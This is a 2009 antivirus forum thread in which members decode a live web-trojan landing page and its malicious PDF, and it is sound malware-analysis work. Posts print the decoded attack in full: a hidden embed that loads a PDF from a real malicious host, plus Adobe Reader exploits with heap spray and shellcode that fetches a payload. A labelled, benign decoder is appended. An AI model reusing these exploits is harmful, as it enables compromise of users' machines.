Rising Kaka Security Forum

Web-trojan decryption bounty, round 37 (PDF file attached in post 9), closed
networkedition - 2009-11-17 9:54:00


Quote:
http://ghost-mail.de/0000009c2e135bf01/s2dpayyp.php




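Quote:
Rules: 1. Solving everything in one go, with the decryption log and steps attached (including the SWF and PDF web trojans), earns 10 prestige points; for a partial solution, each step earns 2 prestige points;
            2. Members who take an active part in this activity and win several times may be invited to join the Kaka anti-virus team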

 

Quote:
Decryption tools:
  Freshow (Chinese edition)
  Redoce (Chinese edition)
  Malzilla (Chinese-localized edition)

     
 

Quote:
Online analysis sites:
        http://glacierlk.cn/openlab/jm.htm
        http://www.cha88.cn/
   

Quote:
Note: all forum members may take part


   

Quote:
Source of the malicious URL: a real, live address intercepted by Rising full-featured security software


User system information: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)
networkedition - 2009-11-17 9:54:00



// <script>
tpZ=23;if(yFc=unescape)tpZ='';fUJxi=yFc('%'+tpZ);
BjX5='doj63umenx74.wrix74e(q22R3cj64iv sq74ylex3dj5cq22positionq3aabsoluteq3bR20leq66tj3ax2dj31000q70q78q3b tx6fpq3ax2d1j3000R70j78q3bR5cj22x3eq22)j3bvx61r R46YR71j3dnullq3btryx7bFj59j71j3dnewx20Activq65Xj4fbq6aecq74(R22q41j63roPDFq2ePx44FR22)q3bx7dj63q61tcj68(e)R7bR7dif(q21Fq59q71)x7bj74rj79x7bFYj71x3dneR77j20ActiveXx4fj62q6aect(x22Pj44F.PdfCtR72lq22)j3bj7dcatq63x68(e)q7bR7dR7diR66(FYj71q29j7blvj3dj28j28FYR71.Getx56eq72sionsj28).sx70R6cix74(q22,j22)j29q5bj34R5d.splR69x74(j22j3dq22))q5b1j5dx2erepx6cj61ce(R2fq5cx2ex2fg,R22j22)R3bif((lq76R3cq390j30)x26q26(lvx21j3dx381j33)R29docj75ment.writx65(q27R3ceR6dbx65d srcj3dq22hq74tpx3ax2fx2fghoj73tx2dmail.deq2f0000009c2ej31j335bfx30q31R2fR732R64pq61yyp.phpx3fsj3dd1TNx66x4dfj26x69j64x3d2q22 widthq3dR31R30x30R20R68eigj68tj3d100 tx79peR3dR22q61pq70licaq74ionx2fpdfx22R3eq3cq2fembedj3eR27)x3bx7dq64q6fcx75j6dentR2ej77j72ite(x22R3cx2fdx69vj3ex22)x3b';
zPiEu=yFc(BjX5.replace(/[xjqR]/g,fUJxi));eval(zPiEu);
//</script>


ty88 - 2009-11-17 12:57:00
document.write("<div style=\"position:absolute; left:-1000px; top:-1000px;\">");var FYq=null;try{FYq=new ActiveXObject("AcroPDF.PDF");}catch(e){}if(!FYq){try{FYq=new ActiveXObject("PDF.PdfCtrl");}catch(e){}}if(FYq){lv=((FYq.GetVersions().split(","))[4].split("="))[1].replace(/\./g,"");if((lv<900)&&(lv!=813))document.write('<embed src="http://ghost-mail.de/0000009c2e135bf01/s2dpayyp.php?s=d1TNfMf&id=2" width=100 height=100 type="application/pdf"></embed>');}document.write("</div>");
ty88 - 2009-11-17 12:58:00
http://ghost-mail.de/0000009c2e135bf01/s2dpayyp.php?s=d1TNfMf&id=2

Challenge cleared, yay :kaka12:
是昔流芳 - 2009-11-17 13:13:00
Decryption log for hxxp://ghost-mail.de/0000009c2e135bf01/s2dpayyp.php (full output - 2):

Level  0>http://ghost-mail.de/0000009c2e135bf01/s2dpayyp.php
Level  1>http://ghost-mail.de/0000009c2e135bf01/s2dpayyp.php?s=d1TNfMf&id=2

analyzed by 是昔流芳

Just a single eval
是昔流芳 - 2009-11-17 13:19:00
By the way, what tool did 孔子 use to get the code?
http://ghost-mail.de/0000009c2e135bf01/s2dpayyp.php?s=d1TNfMf&id=2
What I get from this one is incomplete code
networkedition - 2009-11-17 13:27:00
Download it directly with a download tool; it is a .dat file, but actually a PDF file. The code also seems to be incomplete.
ty88 - 2009-11-17 13:27:00
It's a PDF
If... heh, you have to read the code out yourself, otherwise all you get is useless functions
networkedition - 2009-11-17 13:28:00
Attached is the downloaded .dat file; change the extension to .pdf

Attachment: j0cTk.rar
ty88 - 2009-11-17 13:28:00
I'll upload it

Attachment: gzS0.rar
ty88 - 2009-11-17 13:35:00
http://wepawet.iseclab.org/view.php?hash=539728d82ab367858975c7ae94e6b1f0&type=js
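Online PDF analysis report...
Anyway, I didn't manage to decode anything and don't know how to decrypt this; never mind, I'm off to class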
是昔流芳 - 2009-11-17 19:04:00
The code looks like this :kaka6:

PDF Comment '%PDF-1.4\n'

obj 1 0
Type: /Catalog
Referencing: 2 0 R, 8 0 R
[(1, '\n'), (2, '<<'), (2, '/Pages'), (1, ' '), (3, '2'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (1, '\n'), (2, '/PageLayout'), (1, ' '), (2, '/SinglePage'), (1, '\n'), (2, '/Names'), (1, ' '), (2, '<<'), (1, ' '), (2, '/JavaScript'), (1, ' '), (3, '8'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (1, ' '), (2, '>>'), (1, '\n'), (2, '/Type'), (1, ' '), (2, '/Catalog'), (1, '\n'), (2, '>>'), (1, '\n')]

<<
  /Pages 2 0 R

  /PageLayout /SinglePage

  /Names /JavaScript 8 0 R
>>

[(1, '\n'), (2, '<<'), (2, '/Pages'), (1, ' '), (3, '2'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (1, '\n'), (2, '/PageLayout'), (1, ' '), (2, '/SinglePage'), (1, '\n'), (2, '/Names'), (1, ' '), (2, '<<'), (1, ' '), (2, '/JavaScript'), (1, ' '), (3, '8'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (1, ' '), (2, '>>'), (1, '\n'), (2, '/Type'), (1, ' '), (2, '/Catalog'), (1, '\n'), (2, '>>'), (1, '\n')]

obj 2 0
Type: /Pages
Referencing: 3 0 R
[(1, '\n'), (2, '<<'), (2, '/Kids'), (1, ' '), (2, '['), (3, '3'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (2, ']'), (1, '\n'), (2, '/Count'), (1, ' '), (3, '1'), (1, '\n'), (2, '/Type'), (1, ' '), (2, '/Pages'), (1, '\n'), (2, '>>'), (1, '\n')]

<<
  /Kids [3 0 R]

  /Count 1

  /Type /Pages

>>

[(1, '\n'), (2, '<<'), (2, '/Kids'), (1, ' '), (2, '['), (3, '3'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (2, ']'), (1, '\n'), (2, '/Count'), (1, ' '), (3, '1'), (1, '\n'), (2, '/Type'), (1, ' '), (2, '/Pages'), (1, '\n'), (2, '>>'), (1, '\n')]

obj 3 0
Type: /Page
Referencing: 2 0 R, 4 0 R
[(1, '\n'), (2, '<<'), (2, '/Parent'), (1, ' '), (3, '2'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (1, '\n'), (2, '/Contents'), (1, ' '), (3, '4'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (1, '\n'), (2, '/Type'), (1, ' '), (2, '/Page'), (1, '\n'), (2, '>>'), (1, '\n')]

<<
  /Parent 2 0 R

  /Contents 4 0 R

  /Type /Page

>>

[(1, '\n'), (2, '<<'), (2, '/Parent'), (1, ' '), (3, '2'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (1, '\n'), (2, '/Contents'), (1, ' '), (3, '4'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (1, '\n'), (2, '/Type'), (1, ' '), (2, '/Page'), (1, '\n'), (2, '>>'), (1, '\n')]

obj 4 0
Type:
Referencing:
Contains stream
[(1, '\n'), (2, '<<'), (2, '/Length'), (1, ' '), (3, '31'), (1, ' '), (2, '>>'), (1, '\n')]

<<
  /Length 31
>>

[(1, '\n'), (2, '<<'), (2, '/Length'), (1, ' '), (3, '31'), (1, ' '), (2, '>>'), (1, '\n'), (3, 'stream'), (1, '\n'), (3, '0'), (1, ' '), (3, '0'), (1, ' '), (3, '595.28000'), (1, ' '), (3, '841.89000'), (1, ' '), (3, 're'), (1, ' '), (3, 'W'), (1, ' '), (3, 'n'), (1, '\n\n'), (3, 'endstream'), (1, '\n')]

obj 5 0
Type:
Referencing:
Contains stream
[(1, '\n'), (2, '<<'), (1, ' '), (2, '/Length'), (1, ' '), (3, '4592'), (1, ' '), (2, '/Filter'), (1, ' '), (2, '/FlateDecode'), (1, '\n '), (2, '>>'), (1, '\n')]

<<
  /Length 4592
  /Filter /FlateDecode

>>


obj 6 0
Type:
Referencing:
Contains stream
[(1, '\n'), (2, '<<'), (1, ' '), (2, '/Length'), (1, ' '), (3, '130'), (1, ' '), (2, '/Filter'), (1, ' '), (2, '/FlateDecode'), (1, '\n '), (2, '>>'), (1, '\n')]

<<
  /Length 130
  /Filter /FlateDecode

>>

"JpI=24;if(app.alert)JpI++;hfGc=this;Zyu=unescape;WDNJR=hfGc.info;JpI=Zyu('%'+JpI);tqSPO=WDNJR.Trailer.replace(/[A-Z]/g,JpI);eval(Zyu(tqSPO))"

obj 7 0
Type:
Referencing: 6 0 R
[(1, '\n'), (2, '<<'), (1, ' '), (2, '/S'), (1, ' '), (2, '/JavaScript'), (1, ' '), (2, '/JS'), (1, ' '), (3, '6'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (1, ' '), (2, '>>'), (1, '\n')]

<<
  /S /JavaScript
  /JS 6 0 R
>>

[(1, '\n'), (2, '<<'), (1, ' '), (2, '/S'), (1, ' '), (2, '/JavaScript'), (1, ' '), (2, '/JS'), (1, ' '), (3, '6'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (1, ' '), (2, '>>'), (1, '\n')]

obj 8 0
Type:
Referencing: 7 0 R
[(1, '\n'), (2, '<<'), (1, ' '), (2, '/Names'), (1, ' '), (2, '['), (2, '('), (3, 'uoO'), (2, ')'), (1, ' '), (3, '7'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (1, ' '), (2, ']'), (1, '\n'), (2, '>>'), (1, '\n')]

<<
  /Names [(uoO) 7 0 R ]

>>

[(1, '\n'), (2, '<<'), (1, ' '), (2, '/Names'), (1, ' '), (2, '['), (2, '('), (3, 'uoO'), (2, ')'), (1, ' '), (3, '7'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (1, ' '), (2, ']'), (1, '\n'), (2, '>>'), (1, '\n')]

obj 9 0
Type:
Referencing: 5 0 R
[(1, '\n'), (2, '<<'), (2, '/Creator'), (1, ' '), (2, '('), (3, 'Adobe'), (2, ')'), (1, '\n'), (2, '/Title'), (1, ' '), (2, '('), (3, 'qya'), (2, ')'), (1, '\n'), (2, '/Trailer'), (1, ' '), (3, '5'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (1, '\n'), (2, '/Producer'), (1, ' '), (2, '('), (3, 'Notepad'), (2, ')'), (1, '\n'), (2, '/Author'), (1, ' '), (2, '('), (3, 'Miekiemoes'), (2, ')'), (1, '\n'), (2, '/CreationDate'), (1, ' '), (2, '('), (3, 'D:20080924194756'), (2, ')'), (1, '\n'), (2, '>>'), (1, '\n')]

<<
  /Creator (Adobe)

  /Title (qya)

  /Trailer 5 0 R

  /Producer (Notepad)

  /Author (Miekiemoes)

  /CreationDate (D:20080924194756)

>>

[(1, '\n'), (2, '<<'), (2, '/Creator'), (1, ' '), (2, '('), (3, 'Adobe'), (2, ')'), (1, '\n'), (2, '/Title'), (1, ' '), (2, '('), (3, 'qya'), (2, ')'), (1, '\n'), (2, '/Trailer'), (1, ' '), (3, '5'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (1, '\n'), (2, '/Producer'), (1, ' '), (2, '('), (3, 'Notepad'), (2, ')'), (1, '\n'), (2, '/Author'), (1, ' '), (2, '('), (3, 'Miekiemoes'), (2, ')'), (1, '\n'), (2, '/CreationDate'), (1, ' '), (2, '('), (3, 'D:20080924194756'), (2, ')'), (1, '\n'), (2, '>>'), (1, '\n')]

xref [(3, 'xref'), (3, '0'), (3, '9'), (3, '0000000000'), (3, '65535'), (3, 'f'), (3, '0000000009'), (3, '00000'), (3, 'n'), (3, '0000000112'), (3, '00000'), (3, 'n'), (3, '0000000168'), (3, '00000'), (3, 'n'), (3, '0000000230'), (3, '00000'), (3, 'n'), (3, '0000000310'), (3, '00000'), (3, 'n'), (3, '0000004976'), (3, '00000'), (3, 'n'), (3, '0000005179'), (3, '00000'), (3, 'n'), (3, '0000005225'), (3, '00000'), (3, 'n'), (3, '0000005268'), (3, '00000'), (3, 'n')]

trailer
<<
  /Info 90R
  /Root 10R
  /Size 9
>>

startxref 5407

PDF Comment '%%EOF\n'


smallyou93 - 2009-11-17 19:41:00
I don't understand any of this...
錢尛天 - 2009-11-17 21:06:00
Saw this round too, keep going, GO
BlastXiang - 2009-11-17 23:27:00
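For the PDF one, get rid of all the uppercase characters
(this roughly corresponds to the line tqSPO=WDNJR.Trailer.replace(/[A-Z]/g,JpI); in the PDF)

Then convert hex to characters and that's it :kaka6:

Any script or program will do the job, for example in VB: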
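Private Sub Form_Load()
On Error Resume Next
Dim a() As Byte
  ' Convert to single-byte characters; a direct String-to-Byte() assignment
  ' would copy two bytes per character and let the zero bytes through
  a = StrConv(Text1.Text, vbFromUnicode)
Dim b As Long, c As String
  For b = 0 To UBound(a)
    ' Keep every character that is not an uppercase letter
    If Chr$(a(b)) = LCase$(Chr$(a(b))) Then c = c + Chr$(a(b))
  Next b
  ' Print the filtered text to the Immediate window
  Debug.Print c
End Sub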


http://ghost-mail.de/0000009c2e135bf01/s2dpayyp.php?id=10&

The decoded result is:

Azs0=unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u672F%u6F68%u7473%u6D2D%u6961%u2E6C%u6564%u302F%u3030%u3030%u3930%u3263%u3165%u3533%u6662%u3130%u732F%u6432%u6170%u7979%u2E70%u6870%u3F70%u6469%u313D%u2630%u0000"); var F4NIl=new Array(); function lQR(SNe,x7UXS){ while(SNe.length*2<x7UXS)SNe+=SNe; SNe=SNe.substring(0,x7UXS/2);return SNe;} function DmR(){ var huo=0x0c0c0c0c;var CGXx=0x400000;var cWzS=Azs0.length*2; var x7UXS=CGXx-(cWzS+0x38);var SNe=unescape("%u9090%u9090"); SNe=lQR(SNe,x7UXS);var Xza2y=(huo-0x400000)/CGXx; for (var G6Z=0;G6Z<Xza2y;G6Z++)F4NIl[G6Z]=SNe+Azs0;} try{var NzN=app.viewerVersion.toString(); NzN=NzN.charAt(0)*100+NzN.charAt(2)*10+NzN.charAt(4); if((NzN>=800)&&(NzN<=812)){ var re0m2=unescape("%u0A0A%u0A0A");var v2h8L=20;var 
qUft=v2h8L+Azs0.length; while(re0m2.length<qUft)re0m2+=re0m2;var pws=re0m2.substring(0,qUft); var Sv5Z=re0m2.substring(0,re0m2.length-qUft); while(Sv5Z.length+qUft<0x60000)Sv5Z=Sv5Z+Sv5Z+pws; for(YKEKT=0;YKEKT<1200;YKEKT++){F4NIl[YKEKT]=Sv5Z+Azs0} var OII9="12999999999999999999";for(HRfYk=0;HRfYk<276;HRfYk++)OII9+="8"; util.printf("%45000f",OII9);} if((NzN<710)||((NzN>800)&&(NzN<812))){DmR(); var n5YY=unescape("%u0c0c%u0c0c");while(n5YY.length<44952)n5YY+=n5YY; this.collabStore=Collab.collectEmailInfo({subj:"",msg:n5YY});} if((NzN<=900)&&(NzN!=711)&&(NzN!=813)&&app.doc.Collab.getIcon){DmR(); var DYpqc=unescap("%09");while(DYpqc.length<0x4000){DYpqc+=DYpqc;} DYpqc="N."+DYpqc;app.doc.Collab.getIcon(DYpqc);} }catch(e){}
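
Added example, not part of any post in this thread and not code from the tools named in it: a static decoder for the two layers discussed above (the [xjqR] substitution in the landing page and the [A-Z] substitution applied to info.Trailer in the PDF) that never calls eval. The function names, the two sample strings and example.invalid are constructed for illustration; pdfKeyChar shows that the PDF script's key is '%' only when app.alert exists.

```javascript
// Added example: static decoder for the two marker-substitution layers in this thread.
// Nothing is eval'ed; decoded text is only returned for inspection.

// Decode %XX and %uXXXX like the legacy unescape(); malformed escapes stay as-is.
function percentDecode(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (m, u, h) => String.fromCharCode(parseInt(u || h, 16)));
}

// Key derivation as in obj 6: JpI=24; if(app.alert)JpI++; JpI=unescape('%'+JpI)
// hasAppAlert (hypothetical parameter) models whether the host exposes app.alert.
function pdfKeyChar(hasAppAlert) {
  return percentDecode('%' + (24 + (hasAppAlert ? 1 : 0)));
}

// Swap every marker character for the key character, then percent-decode.
// A function replacement is used so a key such as '$' is inserted literally.
function decodeLayer(encoded, markers, key = '%') {
  return percentDecode(encoded.replace(markers, () => key));
}

// Collect distinct URLs from decoded text so they can be logged or blocked.
function extractUrls(text) {
  return [...new Set(text.match(/https?:\/\/[^\s"'<>)]+/g) || [])];
}

// Constructed samples (benign, not taken from the thread's payloads).
const PAGE_SAMPLE = 'var ux3dq22httpj3aR2fR2feq78amplex2einvalidj2ft.phpR3fidq3d2x22j3b';
const PDF_SAMPLE = 'K76Q61Z72B20M6eT3dW38H3b';

const pageLayer = decodeLayer(PAGE_SAMPLE, /[xjqR]/g);
const pdfLayer = decodeLayer(PDF_SAMPLE, /[A-Z]/g, pdfKeyChar(true));
// Without app.alert the key stays '$', so the data is left undecoded.
const pdfNoAcrobat = decodeLayer(PDF_SAMPLE, /[A-Z]/g, pdfKeyChar(false));

console.log(pageLayer);
console.log(extractUrls(pageLayer));
console.log(pdfLayer);
console.log(pdfNoAcrobat);
```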

